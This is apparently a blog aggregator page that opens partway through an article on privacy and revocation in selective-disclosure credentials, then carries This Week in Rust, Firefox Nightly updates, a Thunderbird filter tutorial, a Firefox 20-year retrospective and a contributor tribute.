Revoking anonymous credentials

When you have anonymous credentials, which protect against verifier-issuer linkability, revocation is very challenging. A zero-knowledge assertion that the credential has not been revoked is theoretically possible, but there are a number of serious challenges. One issue is that proof of non-revocation depends on providing real-time or near-real-time information about the underlying credential. Research into solving the problem is still active.

It is possible that revocation for some selective disclosure cases is unnecessary. Especially those cases where zero-knowledge proofs are used. We have already accepted some baseline amount of abuse of credentials, by virtue of permitting non-identifying and unlinkable presentations. Access to a stolen credential is roughly equivalent to sharing or borrowing a credential. So, as long as the overall availability of stolen credentials is not too high relative to the availability of borrowed credentials, the value of revocation is low. In other words, if we accept some risk that credentials will be borrowed, then we can also tolerate some use of stolen credentials.

Revocation complications

Even with linkability, revocation is not entirely trivial. Revocation effectively creates a remote kill switch for every credential that exists. The safeguards around that switch are therefore crucial in determining how the system behaves.

For example, if any person can ask for revocation, that might be used to deny a person the use of a perfectly valid credential. There are well documented cases where organized crime has deprived people of access to identification documents in order to limit their ability to travel or access services.

These problems are more tied to the processes that are used, rather than the technical design. However, technical measures might be used to improve the situation. For instance, SD-BLS suggests that threshold revocation be used, where multiple actors need to agree before a credential can be revoked.

All told, and especially if dealing with revocation on the Web has taught us anything, it might not be worth the effort to add revocation. It might be easier — and no less safe — to frequently update credentials.

Authorizing Verifiers

Selective disclosure systems can fail to achieve their goals if there is a power imbalance between verifiers and holders. For instance, a verifier might withhold services unless a person agrees to provide more information than the verifier genuinely requires. That is, the verifier might effectively extort people to provide non-essential information. A system that can withhold information to improve privacy is pointless if people cannot exercise that withholding in practice.

One way to work around this is to require that verifiers be certified before they can request certain information. For instance, EU digital identity laws require that it be possible to restrict who can request a presentation. This might involve the certification of verifiers, so that verifiers would be required to provide holders with evidence that they are authorized to receive certain attributes.
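
As a sketch of what the wallet-side check might look like, suppose the verifier presents an authorization record listing the attributes it is permitted to request. The attribute names and the shape of the record below are invented for illustration; a real system would carry this in a certificate issued by whatever body certifies verifiers.

```python
# Hypothetical authorization record presented by a verifier. The wallet refuses
# any request that goes beyond the attributes the verifier is authorized to receive.
verifier_authorization = {
    "verifier": "example-bar-and-grill",
    "authorized_attributes": {"age_over_21"},
}

def allowed_request(requested_attributes, authorization):
    """Every requested attribute must appear in the verifier's authorization."""
    return set(requested_attributes) <= authorization["authorized_attributes"]

print(allowed_request({"age_over_21"}, verifier_authorization))                   # True
print(allowed_request({"age_over_21", "home_address"}, verifier_authorization))   # False: overreach
```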

A system of verifier authorization could limit overreach, but it might also render credentials ineffective in unanticipated situations, including for interactions in foreign jurisdictions.

Authorizations also need monitoring for compliance. Businesses — particularly larger businesses that engage in many activities — might gain authorization for many different purposes. Abuse might occur if a broad authorization is used where a narrower authorization is needed. That means more than a system of authorization: it also means creating a way to ensure that businesses or agencies are accountable for their use of credentials.

Quantum computers

Some of these systems depend on cryptography that is only classically secure. That is, a sufficiently powerful quantum computer might be able to attack the system.

Salted hash selective disclosure relies only on digital signatures and hash functions, which makes it the most resilient to attacks that use a quantum computer. However, many of the other systems described rely on some version of the discrete logarithm problem being difficult, which can make them vulnerable. Predicting when a cryptographically-relevant quantum computer might be created is as hard as any other attempt to look into the future, but we can understand some of the risks.
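
To see why this construction needs nothing beyond hashes and signatures, here is a minimal sketch of salted-hash selective disclosure using Python's standard library. The attributes are made up, and the issuer's signature over the list of commitments is elided; any conventional signature scheme could be used there.

```python
import hashlib
import secrets

def commit(attribute_name, value, salt):
    """Salted hash commitment to a single attribute."""
    data = f"{attribute_name}:{value}:{salt}".encode()
    return hashlib.sha256(data).hexdigest()

# Issuer: commit to every attribute with a fresh random salt, then sign the
# list of commitments (signature elided here; any standard scheme would do).
attributes = {"name": "Alex Example", "birth_date": "1990-01-01", "address": "123 Main St"}
salts = {name: secrets.token_hex(16) for name in attributes}
signed_commitments = {name: commit(name, value, salts[name]) for name, value in attributes.items()}

# Holder: disclose only the birth date, along with its salt.
disclosed = ("birth_date", attributes["birth_date"], salts["birth_date"])

# Verifier: recompute the hash and check it against the signed list of
# commitments. Undisclosed attributes stay hidden behind their salted hashes.
name, value, salt = disclosed
assert commit(name, value, salt) == signed_commitments[name]
print("birth_date verified without revealing name or address")
```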

Quantum computers present two potential threats to any system that relies on classical cryptographic algorithms: forgery and linkability.

A sufficiently powerful quantum computer might use something like Shor’s algorithm to recover the secret key used to issue credentials. Once that key has been obtained, new credentials could be easily forged. Of course, forgeries are only a threat after the key is recovered.

Some schemes that rely on classical algorithms could be vulnerable to linking by a quantum computer, which could present a very serious privacy risk. This sort of linkability is a serious problem because it potentially affects presentations that are made before the quantum computer exists. Presentations that were saved by verifiers could later be linked.

Some of the potential mechanisms, such as the BBS algorithm, are still able to provide privacy, even if the underlying cryptography is broken by a quantum computer. The quantum computer would be able to create forgeries, but not break privacy by linking presentations.

If forgery is not a concern until a quantum computer exists, and privacy is maintained even then, we are largely concerned with how long we might be able to use these systems. That gets back to the problem of predictions and balancing the cost of deploying a system against how long the system is going to remain secure. Credential systems take a long time to deploy, so — while they are not vulnerable to a future advance in the same way as encryption — planning for that future is likely necessary.

The limitations of technical solutions

If there is a single conclusion to this article, it is that the problems that exist in identity systems are not primarily technical. There are several very difficult problems to consider when establishing a system. Those problems only start with the selection of technology.

Any technological choice presents its own problems. Selective disclosure is a powerful tool, but with limited applicability. Properties like linkability need to be understood or managed. Otherwise, the actual privacy properties of the system might not meet expectations. The same goes for any rate limits or revocation that might be integrated.

How different actors might participate in the system needs further consideration. Decisions about who might act as an issuer in the system need a governance structure. Otherwise, some people might be unjustly denied the ability to participate.

For verifiers, incentives need to be examined. A selective disclosure system might be built to be flexible, which might seem to empower people with choice about what they disclose; however, that flexibility might be abused by powerful verifiers to extort additional information from people.

All of which is to say: better technology does not always help as much as you might hope. Many of the problems are people problems, social problems, and governance problems, not technical problems. Technical mechanisms tend to only change the shape of non-technical problems. That is only helpful if the new shape of the problem is something that people are better able to deal with.


  1. This is different from licensing to drive, where most countries recognize driving permits from other jurisdictions. That’s probably because buying alcohol is a simple check based on an objective measure, whereas driving a car is somewhat more involved. ↩︎

  2. Well, most of the US. It has to do with highways. ↩︎

  3. The issuer might want some additional assurances, like some controls over how the credential can be accessed, controls over what happens if a device is lost, stolen, or sold, but they all basically reduce to this basic idea. ↩︎

  4. If the presentation didn’t include information about the verifier and time of use, one verifier could copy the presentation they receive and impersonate the person. ↩︎

  5. Rainbow tables can handle relatively large numbers of values without too much difficulty. Even some of the richer fields can probably be put in a rainbow table. For example, there are about 1.4 million people in Hawaii. All the values for some fields are known, such as the complete set of possible addresses. Even if every person has a unique value, a very simple rainbow table for a field would take a few seconds to build and around 100MB to store, likely a lot less. A century of birthdays would take much less storage[6]. ↩︎

  6. In practice, a century of birthdays (40k values) will have no collisions with even a short hash. You don’t need much more than 32 bits for that many values. Furthermore, if you are willing to have a small number of values associated with each hash, you can save even more space. 40k values can be indexed with a 16-bit value and a 32-bit hash will produce very few collisions. A small number of collisions are easy to resolve by hashing a few times, so maybe this could be stored in about 320kB with no real loss of utility. ↩︎

  7. There are a few things that need care, like whether different attributes can be bound to a different wallet key and whether the attributes need to show common provenance. With different keys, the holder might mix and match attributes from different people into a single presentation. ↩︎

  8. To continue the tortured analogy, imagine that you take a photo of the credential to present, so that the recipient can’t just scratch off the stuff that you didn’t. Or maybe you add a clear coat of enamel. ↩︎

  9. For example, Article 5a, 16 of the EU Digital Identity Framework requires that wallets “not allow providers of electronic attestations of attributes or any other party, after the issuance of the attestation of attributes, to obtain data that allows transactions or user behaviour to be tracked, linked or correlated, or knowledge of transactions or user behaviour to be otherwise obtained, unless explicitly authorised by the user”. ↩︎

  10. A proof can be arbitrarily complex, so this isn’t always cheap, but most of the things we imagine here are probably very manageable. ↩︎

  11. This isn’t quite accurate. The typical approach involves the use of tokens that repeat if the credential is reused too often. That makes it possible to catch reuse, not prevent it. ↩︎

This Week In RustThis Week in Rust 574

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation

EuroRust 2024

RustConf 2024

Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is fixed-slice-vec, a no-std dynamic length Vec with runtime-determined maximum capacity backed by a slice.

Thanks to Jay Oster for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
Rust
Rustup

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

480 pull requests were merged in the last week

Rust Compiler Performance Triage

We saw improvements to a large swath of benchmarks with the querification of MonoItem collection (PR #132566). There were also some PRs where we are willing to pay a compile-time cost for expected runtime benefit (PR #132870, PR #120370), or pay a small cost in the single-threaded case in exchange for a big parallel compilation win (PR #124780).

Triage done by @pnkfelix. Revision range: d4822c2d..7d40450b

2 Regressions, 4 Improvements, 10 Mixed; 6 of them in rollups
47 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs were approved this week.
Tracking Issues & PRs
Rust Cargo Language Team
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-11-20 - 2024-12-18 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

The whole point of Rust is that before there were two worlds:

  • Inefficient, garbage collected, reliable languages
  • Efficient, manually allocated, dangerous languages

And the mark of being a good developer in the first was mitigating the inefficiency well, and for the second it was it didn't crash, corrupt memory, or be riddled with security issues. Rust makes the trade-off instead that being good means understanding how to avoid the compiler yelling at you.

Simon Buchan on rust-users

Thanks to binarycat for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Firefox NightlyNew Address Bar Updates are Here – These Weeks in Firefox: Issue 172

Highlights

  • Our newly updated address bar, also known as “Scotch Bonnet”, is available in Nightly builds! 🎉
  • Weather suggestions have also been enabled in Nightly. The feature is US only at this time, as part of Firefox Suggest. 🌧️
  • robwu fixed a regression introduced in Firefox 132 that was triggering the default built-in theme to be re-enabled on every browser startup – Bug 1928082
  • Love Firefox Profiler and DevTools? Check out the latest DevTools updates and see how they can better help you track down issues.

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  • abhijeetchawla[:ff2400t]
  • Collin Richards
  • John Bieling (:TbSync)
  • kernp25

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • As part of Bug 1928082, the new test_default_theme.js xpcshell test will fail if the default theme version in the manifest and in the XPIProvider startup call to maybeInstallBuiltinAddon fall out of sync
WebExtensions Framework
  • Fixed a leak in ext-theme hit when an extension was setting a per-window theme using the theme WebExtensions API – Bug 1579943
  • The ExtensionPolicyService content script helper methods have been tweaked to fix a low-frequency crash hit in ExtensionPolicyService::ExecuteContentScripts – Bug 1916569
  • Fixed an unexpected issue with loading a moz-extension URL as a subframe of the background page for extensions loaded temporarily from a directory – Bug 1926106
  • Prevented window.close() calls originating from a WebExtensions-registered devtools panel from closing the browser chrome window (when there is only a single tab open) – Bug 1926373
    • Thanks to Becca King for contributing this fix 🎉
  • Native messaging support for snap-packaged Firefox (default on Ubuntu):
    • Thanks to Alexandre Lissy for working on finalizing the patches from Bug 1661935
    • Fixed a regression hit by the snap-packaged Firefox 133 build – Bug 1930119
WebExtension APIs
  • Fixed a bug preventing declarativeNetRequest API dynamic rules from working correctly after a browser restart for extensions that have no static rules registered – Bug 1921353

DevTools

DevTools Toolbox

DevTools debugger log points being marked in a profiler instance

Lint, Docs and Workflow

  • A change to the mozilla/reject-addtask-only has just landed on Autoland.
    • This makes it so that when the rule is raising an issue with .only() in tests, only the .only() is highlighted, not the whole test:

a before screenshot of the Firefox code linter highlighting a whole test

an after screenshot of the Firefox code linter highlighting the ".only" part of a test

Migration Improvements

New Tab Page

  • The team is working on some new section layout and organization variations – specifically, we’re testing whether or not recommended stories should be grouped into various configurable topic sections. Stay tuned!

Picture-in-Picture

  • Thanks to contributor kernp25 for:
    • Updating our Dailymotion site-specific wrapper (bug), which also happens to fix broken PiP captions (bug).
    • Updating our videojs site-specific wrapper (bug) to recognize multiple cue elements. This fixes PiP captions rendering incorrectly on Windows for some sites.

Search and Navigation

Firefox NightlyCelebrating 20 years of Firefox – These Weeks in Firefox: Issue 171

Highlights

  • Firefox is turning 20 years old! Here’s a sneak peek of what’s to come for the browser.
  • We completed work on the new messaging surface for the AppMenu / FxA avatar menu. There’s a new FXA_ACCOUNTS_APPMENU_PROTECT_BROWSING_DATA entry in about:asrouter for people who’d like to try it. Here’s another variation:

a message with an illustration of a cute fox sitting on a cloud, as well as a sign-up button, encouraging users to create a Mozilla account

  • The experiment will also test new copy for the state of the sign-in button when this message is dismissed:

  • Alexandre Poirot added an option in the Debugger Sources panel to control the visibility of WebExtension content scripts (#1698068)

  • Hubert Boma Manilla improved the Debugger by adding the paused line location in the “paused” section, and making it a live region so it’s announced to screen readers when pausing/stepping (#1843320)

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  • abhijeetchawla[:ff2400t]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • In Firefox >= 133, WebExtensions sidebar panels can close themselves using window.close() (Bug 1921631)
    • Thanks to Becca King for contributing this enhancement to the WebExtensions sidebar panels 🎉
WebExtension APIs
  • A new telemetry probe related to the storage.sync quota has been introduced in Firefox 133 (Bug 1915183). The new probe is meant to help plan replacement of the deprecated Kinto-based backend with a rust-based storage.sync implementation in Firefox for Android (similar to the one introduced in Firefox for desktop v79).

DevTools

DevTools Toolbox

Lint, Docs and Workflow

  • The source documentation generate and upload tasks on CI will now output specific TEST-UNEXPECTED-FAILURE lines for new warnings/errors.
    • Running ./mach doc locally should generally do the same.
    • The previous “max n warnings” has been replaced by an allow list of current warnings/errors.
  • Flat config and ESLint v9 support has now been added to eslint-plugin-mozilla.
    • This is a big step in preparing to switch mozilla-central over to the new flat configuration & then v9.
  • hjones upgraded stylelint to the latest version and swapped its plugins to use ES modules.

New Tab Page

  • The New Tab team is analyzing the results from an experiment that tried different layouts, to see how it impacted usage. Our Data Scientists are poring over the data to help inform design directions moving forward.
  • Another experiment is primed to run once Firefox 132 fully ships to release – the new “big rectangle” vertical widget will be tested to see whether or not users find this new affordance useful.
  • Work completed on the Fakespot experiment that we’re going to be running for Firefox 133 in December. We’ll be using the vertical widget to display products identified as high-quality, with reliable reviews.

Search and Navigation

  • 2024 Address Bar Scotch Bonnet Project
    • Various bugs were fixed by Mandy, Dale, and Yazan
      • quick actions search mode preview was formatted incorrectly (1923550)
      • dedicated Search button was getting stuck after clicking twice (1913193)
      • about chiclets not showing up when scotch bonnet is enabled (1925643)
      • tab to search not shown when scotch bonnet is enabled (1925129)
      • searchmode switcher works when Search Services fails (1906541)
      • localize strings for search mode switcher button (1924228)
      • secondary actions UX updated to be shown between heuristic and first search suggestion. (1922570)
    • To try out these scotch bonnet features, use the pref browser.urlbar.scotchBonnet.enableOverride
  • Address Bar
    • Moritz deduplicated bookmark and history results that have the same URL but different references, behind the pref browser.urlbar.deduplication.enabled. (1924968)
    • Daisuke fixed overlapping remote tab text in compact mode (1924911)
    • Richardscollin, a volunteer contributor, fixed a bug so that pressing Esc while the address bar is selected now returns focus to the window. (1086524)
    • Daisuke fixed the “Not Secure” label being illegible when the width is too small (1925332)
  • Suggest
    • adw has been working on City-based weather suggestions (1921126, 1925734, 1925735, 1927010)
    • adw is working on integrating machine learning (MLSuggest) with UrlbarProviderQuickSuggest (1926381)
  • Search
    • Moritz landed a patch to localize the keyword for the Wikipedia search engine. (1687153, 1925735)
  • Places
    • Yazan landed a favicon improvement to how Firefox picks the best favicon for page-icon URLs without a path. (1664001)
    • Mak landed a patch that significantly improved performance and memory usage when checking for visited URIs, by executing a single query for the entire batch of URIs instead of running one query per URI. (1594368)

Firefox NightlyExperimental address bar deduplication, better auto-open Picture-in-Picture, and more – These Weeks in Firefox: Issue 170

Highlights

  • A new messaging surface for the AppMenu and PXI menu is landing imminently so that we can experiment with some messages to help users understand the value of signing up for / signing into a Mozilla account

a message with a cute fox illustration and a sign-up button in Firefox's app menu encouraging users to create a Mozilla account

  • mconley landed a patch to make the heuristics for the automatic Picture-in-Picture feature a bit smarter. This should make it less likely to auto-pip silent or small videos.
  • Moritz fixed an older bug for the address bar where duplicate Google Docs results had been appearing in the address bar dropdown. This fix is currently behind a disabled pref – people are free to test the behavior by flipping browser.urlbar.deduplication.enabled to true, and feedback is welcome. We’re still investigating UI treatments to eventually show the duplicates. (1389229)

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  • Gregory Pappas [:gregp]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
WebExtensions Framework
  • Thanks to Florian for moving WebExtensions and AddonsManager telemetry probes away from the legacy telemetry API (Bug 1920073, Bug 1923015)
WebExtension APIs
  • The cookies API will be sorting cookies according to RFC 6265 (Bug 1818968), fixing a small Chrome incompatibility issue

Migration Improvements

New Tab Page

  • We will be running an experiment in December featuring a Fakespot feed in the vertical list on newtab. This list will show products that have been identified as high-quality, and with reliable product reviews. They will link to more detailed Fakespot product pages that will give a breakdown of the product analysis. The test is not being monetized.
    • Note: A previous version of this post featured a mockup image that predated the feature being built.

a list of products identified by Fakespot as having reliable reviews for a Holiday Gift Guide, displayed in New Tab.

Picture-in-Picture

  • Special shout-out to volunteer contributor def00111 who has been helping out with our site-specific wrappers!

Search and Navigation

  • 2024 Address Bar Updates (previously known as “Project Scotch Bonnet”)
    • Intuitive Search Keywords
      • Mandy added new telemetry related to intuitive search keywords (1919180)
      • Mandy also landed a patch to list the keywords in the results panel when a user types `@` (1921549)
    • Unified Search Button
      • Daisuke refined our telemetry so that user interactions with the unified search button are differentiated from user interactions with the original one-off search button row (1919857)
    • Persisted Search
      • James fixed a bug related to persisting search terms for non-default search engines (1921092)
    • Search Config v2
      • Moritz landed a patch that streamlines how we handle search parameter names for search engine URLs (1895934)
    • Search & Suggest
      • Nan landed a patch that allows us to integrate a user-interest-based relevance ranking into the address bar suggestions we receive from our Merino server (1923187)
    • Places Database
      • Daisuke landed a series of patches so that the Places database no longer fetches any icons over the network. Icon fetching is now delegated to consumers, which have better knowledge about how to do it safely. (1894633)
    • Favicons
      • Yazan landed several patches related to favicons which improve the way we pick the best favicon, avoiding excessive downscaling of large favicons that could make the favicon unrecognizable. (1494016, 1556396, 1923175)

Mozilla ThunderbirdMaximize Your Day: Make Important Messages Stand Out with Filters

For the past two decades, I’ve been trying to get on Jeopardy. This is harder than answering a Final Jeopardy question in your toughest subject. Roughly a tenth of people who take the exam get invited to auditions, and only a tenth of those who make it to auditions make it to the Contestant Pool and into the show. During this time, there are two emails you DON’T want to miss: the first saying you made it to auditions, and the second that you’re in the Contestant Pool. (This second email comes with your contestant form, and yes, I have my short, fun anecdotes to share with host Ken Jennings ready to go.)

The next time I audition, reader, I won’t be refreshing my inbox every five minutes. Instead, I’ll use Thunderbird Filters to make any emails from the Jeopardy Contestant department STAND OUT.

Whether you’re hoping to be called up for a game show, waiting on important life news, or otherwise needing to be alert, Thunderbird is here to help you out.

Make Important Messages Stand Out with Filters

Most of our previous posts have focused on cleaning out your inbox. Now, in addition to showing you how Thunderbird can clear visual and mental clutter out of the way, we’re using filters to make important messages stand out.

  1. Click the Application menu button, then Tools, followed by Message Filters.
  2. Click New. A Filter Rules dialog box will appear.
  3. In the “Filter Name” field, type a name for your filter.
  4. Under “Apply filter when”, check one or both of the options. (You probably won’t want to change from the default “Getting New Mail” and “Manually Run” options.)
  5. In the “Getting New Mail:” dropdown menu, choose either Filter before Junk Classification or Filter after Junk Classification. (As for me, I’m choosing Filter before Junk Classification. Just in case.)
  6. Choose a property, a test and a value for each rule you want to apply:
  • A property is a message element or characteristic such as “Subject” or “From”
  • A test is a check on the property, such as “contains” or “is in my address book”
  • A value completes the test with a specific detail, such as an email address or keyword
  7. Choose one or more actions for messages that meet those criteria. (For extra caution, I put THREE actions on my sample filter. You might only need one!)
<figcaption class="wp-element-caption">(Note – not the actual Jeopardy addresses!)</figcaption>

Find (and Filter) Your Important Messages

Thunderbird also lets you create a filter directly from a message. Say you’re organizing your inbox and you see a message you don’t want to miss in the future. Highlight the email, and click on the Message menu button. Scroll down to and click on ‘Create Filter from Message.’ This will open a New Filter window, automatically filled with the sender’s address. Add any other properties, tests, or values, as above. Choose your actions, name your filter, and ta-da! Your new filter will help you know when that next important email arrives.

Resources

As with last month’s article, this post was inspired by a Mastodon post (sadly, this one was deleted, but thank you, original poster!). Many thanks to our amazing Knowledge Base writers at Mozilla Support who wrote our guide to filters. Also, thanks to Martin Brinkmann and his ghacks website for this and many other helpful Thunderbird guides!

Getting Started with Filters Mozilla Support article: https://support.mozilla.org/en-US/kb/organize-your-messages-using-filters

How to Make Important Messages Stick Out in Thunderbird: https://www.ghacks.net/2022/12/02/how-to-make-important-emails-stick-out-in-thunderbird/

The post Maximize Your Day: Make Important Messages Stand Out with Filters appeared first on The Thunderbird Blog.

The Mozilla Blog20 years of Firefox: How a community project changed the web

What was browsing the web like in 2004? People said things like “surfing the internet,” for starters. Excessive pop-up ads were annoying but they felt like the norm. The search bar and multiple tabs did not exist, and there seemed to be only one browser in sight. That is, until Firefox 1.0 arrived and gave it real competition.

Built by a group of passionate developers who believed the web should be open, safe and not controlled by a single tech giant, Firefox became the choice for anyone who wanted to experience the internet differently. Millions made the switch, and the web felt bigger. 

As the internet started to evolve, so did Firefox — becoming a symbol of open innovation, digital privacy and, above all, the ability to experience the web on your own terms. Here are some key moments of the last 20 years of Firefox.

2004: Firefox 1.0 launch

Firefox 1.0 launched on Nov. 9, 2004. As an open-source project, Firefox was developed by a global community of volunteers who collaborated to make a browser that’s more secure, user-friendly and customizable. With built-in pop-up blocking, users could finally decide when and if they wanted to see pop-ups. Firefox introduced tabbed browsing, which let people open multiple sites in one window. It also made online safety a priority, with fraud protection to guard against phishing and spoofing. 

<figcaption class="wp-element-caption">On Dec. 15, 2004, Firefox’s community-funded, two-page ad appeared in The New York Times, featuring the names of thousands of supporters and declaring to millions that a faster, safer, and more open browser was here to stay.</figcaption>

2005: Mozilla Developer Center

Mozilla launched the Mozilla Developer Center (now MDN Web Docs) as a hub for web standards and developer resources. Today, MDN remains a trusted resource maintained by Mozilla and a global community of contributors.

A crop circle of the Firefox logo.<figcaption class="wp-element-caption">Local Firefox fans in Oregon made a Firefox crop circle in an oat field in August 2006. </figcaption>

2007: Open-source community support

The SUMO (support.mozilla.org) platform was originally built in 2007 to provide an open-source community support channel for users, and to help us collaborate more effectively with our volunteer contributors. Over the years, SUMO has become a powerful platform that helps users get the most out of Firefox, provides opportunities for users to connect and learn more from each other, and allows us to gather important insights – all powered by our community of contributors. Six active contributors have been with us since day one (shout outs to cor-el, jscher2000, James, mozbrowser, AliceWyman and marsf) and 16 contributors have been here for 15+ years!

<figcaption class="wp-element-caption">A Mozilla contributor story by Chris Hoffman.</figcaption>

2008: A Guinness World Record

Firefox 3.0 made history by setting a Guinness World Record for the most software downloads – over 8 million – in a single day. The event known as Download Day was celebrated across Mozilla communities worldwide, marking a moment of pride for developers, contributors and fans. 

2010: Firefox goes mobile

Firefox made its debut on mobile on Nokia N900. It brought beloved features like tabbed browsing, the Awesome Bar, and Weave Sync, allowing users to sync between desktop and mobile. It also became the first mobile browser to support add-ons, giving users the freedom to customize their browsing on the go.

A blue denim pocket with an orange fox tail sticking out from the top.<figcaption class="wp-element-caption">Pocketfox by Yaroslaff Chekunov, the winner of the “Firefox Goes Mobile” design challenge. </figcaption>

2013: Hello Chrome, it’s Firefox calling

Firefox made a major leap with WebRTC (Web Real-Time Communication), allowing users to make video and voice calls directly between Firefox and Chrome without needing plugins. This cross-browser communication was a breakthrough for open web standards, making it easier for users to connect seamlessly. Firefox also introduced RTCPeerConnection, enabling users to share files during video calls, further enhancing online collaboration.

2014: Privacy on the web

Firefox has shipped a steady drumbeat of anti-tracking features over the years, greatly increasing the privacy of the web. The impact has gone beyond just Firefox users, as online privacy is now a table-stakes deliverable for all browsers.

  • 2014: Block trackers from loading
  • 2016: Containers can isolate sites within Firefox
  • 2018: Enhanced tracking protection blocks tracking cookies (more on this below)
  • 2020: Significant improvements to prevent sites from “fingerprinting” users
  • 2022: Total Cookie Protection isolates all third party tracking cookies (more on this below)

2017: Twice as fast, 30% less memory

The firefox logo on an abstract background in different shades of blue. Text: The new Firefox. Fast for Good

Firefox took a huge step forward with Firefox Quantum, an update that made browsing twice as fast. Thanks to a new engine built using Mozilla’s Rust programming language, Firefox Quantum made pages load faster and used 30% less memory than Chrome. It was all about speed and efficiency, letting users browse quicker without slowing down their computer.

2018: Firefox blocks trackers 

Enhanced Tracking Protection (ETP) was introduced as a new feature that blocks third-party cookies, the primary tool used by companies to track users across websites. ETP made it simple for users to protect their privacy by automatically blocking trackers while ensuring websites still functioned smoothly. Initially an optional feature, ETP became the default setting by early 2019, marking a significant step in giving users better privacy without sacrificing browsing experience.

2019: Advocacy for media formats not encumbered by patents


Mozilla played a significant role in the standardization and adoption of AV1 and AVIF as part of its commitment to open, royalty-free and high-quality media standards for the web. Shipping early support in Firefox for AV1 and AVIF, along with Mozilla’s advocacy, accelerated adoption by platforms like YouTube, Netflix and Twitch. The result is a next-generation, royalty-free video codec that provides high-quality video compression without licensing fees, making it an open and accessible choice for the entire web.

2020: Adobe Flash is discontinued

Adobe retired Flash on Dec. 31, 2020. Mozilla and Firefox played a pivotal role in the end of Adobe Flash by leading the transition toward more secure, performant and open web standards like HTML5, WebGL and WebAssembly. As Firefox and other browsers adopted HTML5, it helped establish these as viable alternatives to Flash. This shift supported more secure and efficient ways to deliver multimedia content, minimizing the web’s reliance on proprietary plugins like Flash.

2022: Total Cookie Protection 

Firefox took privacy further with Total Cookie Protection (TCP), building on the foundation of ETP. Cookies, while helpful for site-specific tasks like keeping you logged in, can also be used by advertisers to track you across multiple sites. TCP isolates cookies by keeping them locked to the site they came from, preventing cross-site tracking. Inspired by the Tor Browser’s privacy features, Firefox’s approach integrates this tool directly into ETP, giving users more control over their data and stopping trackers in their tracks.

2024: 20 years of Firefox

These milestones are just a snapshot of Firefox’s story, full of many chapters that have shaped the web as we know it. Today, Firefox remains at the forefront of championing privacy, open innovation and choice. And while the last 20 years have been transformative, the best is yet to come.

<figcaption class="wp-element-caption">From left to right: Stuart Parmenter, Tracy Walker, Scott McGregor, Ben Goodger, Myk Melez, Chris Hofmann, Asa Dotzler, Johnny Stenbeck, Rafael Ebron, Jay Patel, Vlad Vucecevic and Bryan Ryner. Sitting, from left to right: Chase Philips, David Baron, Mitchell Baker, Brendan Eich, Dan Mosedale, Chris Beard and Doug Turner in 2004. Credit: Mozilla</figcaption>
<figcaption class="wp-element-caption">Mozillians and Foxy in Dublin, Ireland in August 2024. Credit: Mozilla</figcaption>

Get Firefox

Get the browser that protects what’s important

The post 20 years of Firefox: How a community project changed the web appeared first on The Mozilla Blog.

About:CommunityA tribute to Dian Ina Mahendra

It is with a heavy heart that I share the passing of my dear friend, Dian Ina Mahendra, who left us after a long battle with illness. Dian Ina was a remarkable woman whose warmth, kindness, and ever-present support touched everyone around her. Her ability to offer solutions to even the most challenging problems was truly a gift, and she had an uncanny knack for finding a way out of every situation.

Dian Ina’s contributions to Mozilla date back to the launch of Firefox 4 in 2011. She had also been heavily involved during the days of Firefox OS, the Webmaker campaign, FoxYeah, and most recently, Firefox Rocket (later renamed Firefox Lite) when it first launched in Indonesia. Additionally, she had been a dedicated contributor to localization through Pontoon.

Those who knew Dian Ina were constantly drawn to her, not just for her brilliant ideas, but for her open heart and listening ear. She was the person people turned to when they needed advice or simply someone to talk to. No matter how big or small the problem, she always knew just what to say, offering guidance with grace and clarity.

